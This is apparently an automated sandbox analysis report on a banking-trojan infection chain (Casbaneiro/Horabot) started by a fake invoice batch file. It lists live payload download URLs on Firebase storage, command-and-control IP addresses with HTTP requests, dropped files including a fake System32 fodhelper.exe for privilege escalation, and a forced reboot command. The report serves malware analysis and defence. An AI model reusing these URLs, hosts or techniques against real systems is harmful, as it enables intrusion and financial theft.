            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000014.00000002.30390098625.0000014C517D6000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDCEFE1 _stat32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,strlen,GetDriveTypeA,free,free,_sopen_s,_fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,9_2_6FDCEFE1
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDD0F84 _wstat32i64,__doserrno,_errno,_invalid_parameter_noinfo,wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,wcspbrk,wcslen,GetDriveTypeW,free,free,_wsopen_s,_fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,9_2_6FDD0F84
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDD0B33 _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,wcspbrk,wcslen,GetDriveTypeW,free,free,_wsopen_s,_fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,9_2_6FDD0B33
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDCCA9B _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,9_2_6FDCCA9B
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDCC775 _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,9_2_6FDCC775
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDD0702 _wstat32,__doserrno,_errno,_invalid_parameter_noinfo,wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,wcspbrk,wcslen,GetDriveTypeW,free,free,_wsopen_s,_fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,9_2_6FDD0702
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDCDF35 _wfindfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,9_2_6FDCDF35
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDCFD86 _stat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,strlen,GetDriveTypeA,free,free,_sopen_s,_fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,9_2_6FDCFD86
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FD97C6D _wstat64i32,wcspbrk,_getdrive,FindFirstFileExW,wcspbrk,wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,free,_wsopen_s,_fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,9_2_6FD97C6D
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDCDA38 _findfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_seterrormode,SetErrorMode,9_2_6FDCDA38
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDCF8B5 _stat64i32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,strlen,GetDriveTypeA,free,free,_sopen_s,_fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,9_2_6FDCF8B5
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDCD4FF _findfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,9_2_6FDCD4FF
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDCF40B _stat64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,strlen,GetDriveTypeA,free,free,_sopen_s,_fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,9_2_6FDCF40B
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FDCEFE1 _stat32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,strlen,GetDriveTypeA,free,free,_sopen_s,_fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,11_2_6FDCEFE1
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FDD0F84 _wstat32i64,__doserrno,_errno,_invalid_parameter_noinfo,wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,wcspbrk,wcslen,GetDriveTypeW,free,free,_wsopen_s,_fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,11_2_6FDD0F84
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FDD0B33 _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,wcspbrk,wcslen,GetDriveTypeW,free,free,_wsopen_s,_fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,11_2_6FDD0B33
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FDCCA9B _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,11_2_6FDCCA9B
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FDCC775 _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,11_2_6FDCC775
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FDD0702 _wstat32,__doserrno,_errno,_invalid_parameter_noinfo,wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,wcspbrk,wcslen,GetDriveTypeW,free,free,_wsopen_s,_fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,11_2_6FDD0702
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FDCDF35 _wfindfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,11_2_6FDCDF35
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FDCFD86 _stat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,strlen,GetDriveTypeA,free,free,_sopen_s,_fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,11_2_6FDCFD86
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FD97C6D _wstat64i32,wcspbrk,_getdrive,FindFirstFileExW,wcspbrk,wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,free,_wsopen_s,_fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,11_2_6FD97C6D
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FDCDA38 _findfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_seterrormode,SetErrorMode,11_2_6FDCDA38
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FDCF8B5 _stat64i32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,strlen,GetDriveTypeA,free,free,_sopen_s,_fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,11_2_6FDCF8B5
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FDCD4FF _findfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,11_2_6FDCD4FF
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 11_2_6FDCF40B _stat64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,strlen,GetDriveTypeA,free,free,_sopen_s,_fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,11_2_6FDCF40B
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 4x nop then add byte ptr [edi], dh9_2_6FD88468
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 4x nop then push esi9_2_6FD7F640
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 4x nop then add byte ptr [edi], dh11_2_6FD88468
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 4x nop then push esi11_2_6FD7F640

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2841717 - Severity 1 - ETPRO MALWARE PowerShell/TrojanDownloader Casbaneiro CnC : 192.168.11.20:49750 -> 62.72.3.210:80
            Source: Network trafficSuricata IDS: 2052642 - Severity 1 - ET MALWARE Horabot Payload Inbound : 93.127.200.211:443 -> 192.168.11.20:49752
            Source: Network trafficSuricata IDS: 2834717 - Severity 1 - ETPRO MALWARE PowerShell Inbound with Antivirus Enumeration and Downloading Capabilities : 93.127.200.211:443 -> 192.168.11.20:49752
            Source: global trafficHTTP traffic detected: GET /a/08/150822/up/up HTTP/1.1Host: fsnat.shopConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /ldht/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.72.3.210Content-Length: 94Expect: 100-continueConnection: Keep-Alive
            Source: Joe Sandbox ViewASN Name: ASMUNDA-ASSC ASMUNDA-ASSC
            Source: Joe Sandbox ViewASN Name: PRTL-DE PRTL-DE
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknownTCP traffic detected without corresponding DNS query: 86.38.217.167
            Source: unknownTCP traffic detected without corresponding DNS query: 86.38.217.167
            Source: unknownTCP traffic detected without corresponding DNS query: 86.38.217.167
            Source: unknownTCP traffic detected without corresponding DNS query: 86.38.217.167
            Source: unknownTCP traffic detected without corresponding DNS query: 86.38.217.167
            Source: unknownTCP traffic detected without corresponding DNS query: 62.72.3.210
            Source: unknownTCP traffic detected without corresponding DNS query: 62.72.3.210
            Source: unknownTCP traffic detected without corresponding DNS query: 62.72.3.210
            Source: unknownTCP traffic detected without corresponding DNS query: 62.72.3.210
            Source: unknownTCP traffic detected without corresponding DNS query: 62.72.3.210
            Source: unknownTCP traffic detected without corresponding DNS query: 62.72.3.210
            Source: unknownTCP traffic detected without corresponding DNS query: 62.72.3.210
            Source: unknownTCP traffic detected without corresponding DNS query: 86.38.217.167
            Source: unknownTCP traffic detected without corresponding DNS query: 86.38.217.167
            Source: unknownTCP traffic detected without corresponding DNS query: 86.38.217.167
            Source: unknownTCP traffic detected without corresponding DNS query: 86.38.217.167
            Source: unknownTCP traffic detected without corresponding DNS query: 86.38.217.167
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /a/08/150822/up/up HTTP/1.1Host: fsnat.shopConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: fsnat.shop
            Source: unknownHTTP traffic detected: POST /ldht/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.72.3.210Content-Length: 94Expect: 100-continueConnection: Keep-Alive
            Source: powershell.exe, 00000004.00000002.30087129699.000001E792E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.72.3.210
            Source: powershell.exe, 00000004.00000002.30087129699.000001E792A77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://86.38.217.167
            Source: powershell.exe, 0000000D.00000002.29797055442.000000000052B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.30385728857.0000014C514FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: powershell.exe, 0000000D.00000002.29797055442.000000000052B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.30385075264.0000014C514D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: powershell.exe, 00000004.00000002.30086145780.000001E790A45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft.co:
            Source: powershell.exe, 00000004.00000002.30098453152.000001E7A28C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000004.00000002.30087129699.000001E792A77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000004.00000002.30087129699.000001E792A77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngXzi
            Source: powershell.exe, 00000004.00000002.30087129699.000001E7930C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.29798541069.00000000043E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: powershell.exe, 00000004.00000002.30087129699.000001E792851000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.29798541069.0000000004291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.30351811914.0000014C393C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000004.00000002.30087129699.000001E7930C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.29798541069.00000000043E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
            Source: powershell.exe, 00000004.00000002.30087129699.000001E792A77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000004.00000002.30087129699.000001E792A77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXzi
            Source: powershell.exe, 0000000D.00000002.29797055442.000000000052B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.30385728857.0000014C514FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
            Source: powershell.exe, 00000004.00000002.30087129699.000001E792851000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.30351811914.0000014C393C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 0000000D.00000002.29798541069.0000000004291000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
            Source: powershell.exe, 00000004.00000002.30098453152.000001E7A28C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000004.00000002.30098453152.000001E7A28C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000004.00000002.30098453152.000001E7A28C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000004.00000002.30087129699.000001E792FBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firebasestorage.googleapis.com
            Source: curl.exe, 00000002.00000002.29379756087.000001AA88A90000.00000004.00000020.00020000.00000000.sdmp, Factura-2410-CFDI.batString found in binary or memory: https://firebasestorage.googleapis.com/v0/b/antonidesil.appspot.com/o/at3?alt=media&token=0c52e418-0
            Source: powershell.exe, 00000004.00000002.30087129699.000001E792E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firebasestorage.googleapis.com/v0/b/ggsabadon.appspot.com/o/md1910_.zip?alt=media&token=0c46
            Source: powershell.exe, 00000004.00000002.30087129699.000001E792A77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000004.00000002.30087129699.000001E792A77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/PesterXzi
            Source: powershell.exe, 00000004.00000002.30098453152.000001E7A28C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: powershell.exe, 0000000D.00000002.29797055442.000000000052B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.30385728857.0000014C514FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
            Source: unknownHTTPS traffic detected: 93.127.200.211:443 -> 192.168.11.20:49752 version: TLS 1.2

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: amsi64_6872.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: amsi64_7380.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 6872, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Powershell drops PE file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows \System32\fodhelper.exeJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\_kjfech8_V\exe.txtJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\_kjfech8_V\_kjfech8_V.exe (copy)Jump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\_kjfech8_V\MSVCR100.txtJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\_kjfech8_V\i7.txtJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\_kjfech8_V\MSVCR100.dll (copy)Jump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\_kjfech8_V\WebView2Loader.dll (copy)Jump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\_kjfech8_V\WebView2Loader.txtJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\_kjfech8_V\jli.dllJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\_kjfech8_V\_kjfech8_Vi7.exe (copy)Jump to dropped file
            Uses shutdown.exe to shutdown or reboot the system
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\shutdown.exe "C:\Windows\system32\shutdown.exe" /r /t 10
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\WindowsJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows \System32Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows \System32\fodhelper.exeJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDE6E189_2_6FDE6E18
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FD86E289_2_6FD86E28
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FD86E249_2_6FD86E24
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDBEB1A9_2_6FDBEB1A
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDA09199_2_6FDA0919
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FE009159_2_6FE00915
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FE167FF9_2_6FE167FF
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDEE7F19_2_6FDEE7F1
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FD945AE9_2_6FD945AE
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FD884689_2_6FD88468
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FD8839B9_2_6FD8839B
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDE22CD9_2_6FDE22CD
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FD8828B9_2_6FD8828B
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDCA2779_2_6FDCA277
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FE082209_2_6FE08220
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FD8A1DD9_2_6FD8A1DD
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FD721F09_2_6FD721F0
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDE41599_2_6FDE4159
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDCDF359_2_6FDCDF35
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FD85E209_2_6FD85E20
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FD83DB19_2_6FD83DB1
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FD87D209_2_6FD87D20
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FE01CEF9_2_6FE01CEF
